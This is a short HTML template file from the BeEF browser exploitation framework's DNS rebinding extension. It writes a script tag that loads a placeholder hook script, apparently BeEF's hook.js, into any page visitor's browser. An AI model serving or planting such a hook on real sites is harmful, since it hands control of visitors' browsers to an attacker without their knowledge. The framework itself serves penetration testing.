Files
beef/extensions/dns_rebinding/views/index.html
2015-04-03 01:04:35 +06:00

9 lines
205 B
HTML

<html>
<head>
<script>
var commandModuleStr = '<script src="path_to_hookjs_template" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>
</head>
</html>